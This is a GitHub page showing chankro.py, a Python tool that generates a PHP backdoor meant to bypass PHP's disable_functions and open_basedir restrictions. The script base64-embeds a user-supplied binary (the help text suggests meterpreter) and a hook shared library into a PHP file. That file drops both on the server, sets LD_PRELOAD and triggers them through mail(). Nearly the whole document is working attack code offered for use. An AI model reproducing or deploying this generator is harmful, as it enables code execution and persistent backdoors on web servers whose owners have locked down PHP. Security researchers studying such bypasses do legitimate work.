-
Notifications
You must be signed in to change notification settings - Fork 88
/
Copy pathchankro.py
81 lines (65 loc) · 2.38 KB
/
chankro.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
######## Chankro v0.4 #######
# [+] Bypass disable_functions
# [+] Bypass open_basedir
##############################
# @TheXC3LL #
##############################
import argparse
import base64
import os
parser = argparse.ArgumentParser(description='Generate PHP backdoor')
parser.add_argument('--arch', dest='arch',help='Architecture (32 or 64)')
parser.add_argument('--input', dest='meter', help='Binary to be executed (p.e. meterpreter)')
parser.add_argument('--output', dest='out', help='PHP filename')
parser.add_argument('--path', dest='pati', help='Absolute path')
args = parser.parse_args()
# path where the tool is installed
script_path = os.path.dirname(os.path.realpath(__file__))
print "\n\n -=[ Chankro ]=-\n -={ @TheXC3LL }=-\n\n"
if not args.meter:
print "[!] Error: please select a valid file as input"
exit()
try:
with open(args.meter, "rb") as file:
encoded_shell = base64.b64encode(file.read())
except:
print "[!] Error: file could not be opened"
exit()
if not args.out:
print "[!] Error: please select a valid file as output"
exit()
try:
if (os.path.isabs(args.out)):
outfile = open(args.out, "w") # absolute path provided
else:
outfile = open(os.getcwd() + '/' + args.out, "w") # relative path provided
except:
print "[!] Error: file could not be created"
exit()
if not args.arch:
print "[!] Error: select architecture (64 or 32)"
exit()
else:
if args.arch != "32" and args.arch != "64":
print "[!] Error: unknow architecture"
exit()
else:
archi = script_path + "/hook" + args.arch + ".so"
if not args.pati:
print "[!] Error: remote path"
exit()
with open(archi, "rb") as bicho:
encoded_bicho = base64.b64encode(bicho.read())
head = "<?php\n $hook = '" + encoded_bicho + "';\n"
body1 = "$meterpreter = '" + encoded_shell + "';\n"
body2 = "file_put_contents('" + args.pati + "/chankro.so', base64_decode($hook));\n"
body3 = "file_put_contents('" + args.pati + "/acpid.socket', base64_decode($meterpreter));\n"
cosa3 = "putenv('CHANKRO=" + args.pati + "/acpid.socket');\n"
tail1 = "putenv('LD_PRELOAD=" + args.pati + "/chankro.so');\n"
tail2 = "mail('a','a','a','a');?>"
print "[+] Binary file: " + args.meter
print "[+] Architecture: x" + args.arch
print "[+] Final PHP: " + args.out + "\n\n"
outfile.write(head + body1 + body2 + body3 + cosa3 + tail1 + tail2)
outfile.close()
print "[+] File created!"